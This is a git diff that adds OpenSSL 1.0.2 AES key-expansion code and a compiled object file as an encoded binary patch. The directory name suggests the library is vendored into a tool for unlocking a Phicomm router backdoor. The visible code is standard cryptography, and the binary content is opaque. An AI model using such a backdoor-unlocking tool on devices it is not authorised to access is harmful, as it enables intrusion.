+    0x01000000, 0x02000000, 0x04000000, 0x08000000,
+    0x10000000, 0x20000000, 0x40000000, 0x80000000,
+    0x1B000000, 0x36000000, /* for 128-bit blocks, Rijndael never uses more than 10 rcon values */
+};
+
+/**
+ * Expand the cipher key into the encryption key schedule.
+ */
+int private_AES_set_encrypt_key(const unsigned char *userKey, const int bits,
+                                AES_KEY *key)
+{
+    u32 *rk;
+   	int i = 0;
+    u32 temp;
+
+    if (!userKey || !key)
+        return -1;
+    if (bits != 128 && bits != 192 && bits != 256)
+        return -2;
+
+    rk = key->rd_key;
+
+    if (bits==128)
+        key->rounds = 10;
+    else if (bits==192)
+        key->rounds = 12;
+    else
+        key->rounds = 14;
+
+    rk[0] = GETU32(userKey     );
+    rk[1] = GETU32(userKey +  4);
+    rk[2] = GETU32(userKey +  8);
+    rk[3] = GETU32(userKey + 12);
+    if (bits == 128) {
+        while (1) {
+            temp  = rk[3];
+            rk[4] = rk[0] ^
+                (Te4[(temp >> 16) & 0xff] << 24) ^
+                (Te4[(temp >>  8) & 0xff] << 16) ^
+                (Te4[(temp      ) & 0xff] << 8) ^
+                (Te4[(temp >> 24)       ]) ^
+                rcon[i];
+            rk[5] = rk[1] ^ rk[4];
+            rk[6] = rk[2] ^ rk[5];
+            rk[7] = rk[3] ^ rk[6];
+            if (++i == 10) {
+                return 0;
+            }
+            rk += 4;
+        }
+    }
+    rk[4] = GETU32(userKey + 16);
+    rk[5] = GETU32(userKey + 20);
+    if (bits == 192) {
+        while (1) {
+            temp = rk[ 5];
+            rk[ 6] = rk[ 0] ^
+                (Te4[(temp >> 16) & 0xff] << 24) ^
+                (Te4[(temp >>  8) & 0xff] << 16) ^
+                (Te4[(temp      ) & 0xff] << 8) ^
+                (Te4[(temp >> 24)       ]) ^
+                rcon[i];
+            rk[ 7] = rk[ 1] ^ rk[ 6];
+            rk[ 8] = rk[ 2] ^ rk[ 7];
+            rk[ 9] = rk[ 3] ^ rk[ 8];
+            if (++i == 8) {
+                return 0;
+            }
+            rk[10] = rk[ 4] ^ rk[ 9];
+            rk[11] = rk[ 5] ^ rk[10];
+            rk += 6;
+        }
+    }
+    rk[6] = GETU32(userKey + 24);
+    rk[7] = GETU32(userKey + 28);
+    if (bits == 256) {
+        while (1) {
+            temp = rk[ 7];
+            rk[ 8] = rk[ 0] ^
+                (Te4[(temp >> 16) & 0xff] << 24) ^
+                (Te4[(temp >>  8) & 0xff] << 16) ^
+                (Te4[(temp      ) & 0xff] << 8) ^
+                (Te4[(temp >> 24)       ]) ^
+                rcon[i];
+            rk[ 9] = rk[ 1] ^ rk[ 8];
+            rk[10] = rk[ 2] ^ rk[ 9];
+            rk[11] = rk[ 3] ^ rk[10];
+            if (++i == 7) {
+                return 0;
+            }
+            temp = rk[11];
+            rk[12] = rk[ 4] ^
+                (Te4[(temp >> 24)       ] << 24) ^
+                (Te4[(temp >> 16) & 0xff] << 16) ^
+                (Te4[(temp >>  8) & 0xff] << 8) ^
+                (Te4[(temp      ) & 0xff]);
+            rk[13] = rk[ 5] ^ rk[12];
+            rk[14] = rk[ 6] ^ rk[13];
+            rk[15] = rk[ 7] ^ rk[14];
+
+            rk += 8;
+        }
+    }
+    return 0;
+}
+
+/**
+ * Expand the cipher key into the decryption key schedule.
+ */
+int private_AES_set_decrypt_key(const unsigned char *userKey, const int bits,
+                                AES_KEY *key)
+{
+
+    u32 *rk;
+    int i, j, status;
+    u32 temp;
+
+    /* first, start with an encryption schedule */
+    status = private_AES_set_encrypt_key(userKey, bits, key);
+    if (status < 0)
+        return status;
+
+    rk = key->rd_key;
+
+    /* invert the order of the round keys: */
+    for (i = 0, j = 4*(key->rounds); i < j; i += 4, j -= 4) {
+        temp = rk[i    ]; rk[i    ] = rk[j    ]; rk[j    ] = temp;
+        temp = rk[i + 1]; rk[i + 1] = rk[j + 1]; rk[j + 1] = temp;
+        temp = rk[i + 2]; rk[i + 2] = rk[j + 2]; rk[j + 2] = temp;
+        temp = rk[i + 3]; rk[i + 3] = rk[j + 3]; rk[j + 3] = temp;
+    }
+    /* apply the inverse MixColumn transform to all round keys but the first and the last: */
+    for (i = 1; i < (key->rounds); i++) {
+        rk += 4;
+        for (j = 0; j < 4; j++) {
+            u32 tp1, tp2, tp4, tp8, tp9, tpb, tpd, tpe, m;
+
+            tp1 = rk[j];
+            m = tp1 & 0x80808080;
+            tp2 = ((tp1 & 0x7f7f7f7f) << 1) ^
+                ((m - (m >> 7)) & 0x1b1b1b1b);
+            m = tp2 & 0x80808080;
+            tp4 = ((tp2 & 0x7f7f7f7f) << 1) ^
+                ((m - (m >> 7)) & 0x1b1b1b1b);
+            m = tp4 & 0x80808080;
+            tp8 = ((tp4 & 0x7f7f7f7f) << 1) ^
+                ((m - (m >> 7)) & 0x1b1b1b1b);
+            tp9 = tp8 ^ tp1;
+            tpb = tp9 ^ tp2;
+            tpd = tp9 ^ tp4;
+            tpe = tp8 ^ tp4 ^ tp2;
+#if defined(ROTATE)
+            rk[j] = tpe ^ ROTATE(tpd,16) ^
+                ROTATE(tp9,24) ^ ROTATE(tpb,8);
+#else
+            rk[j] = tpe ^ (tpd >> 16) ^ (tpd << 16) ^ 
+                (tp9 >> 8) ^ (tp9 << 24) ^
+                (tpb >> 24) ^ (tpb << 8);
+#endif
+        }
+    }
+    return 0;
+}
+
+#endif /* AES_ASM */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_core.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_core.o
new file mode 100644
index 0000000000000000000000000000000000000000..9a4d86324e5fa483d4aa7f1ed404ae40f8e2ab43
GIT binary patch
literal 15008
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
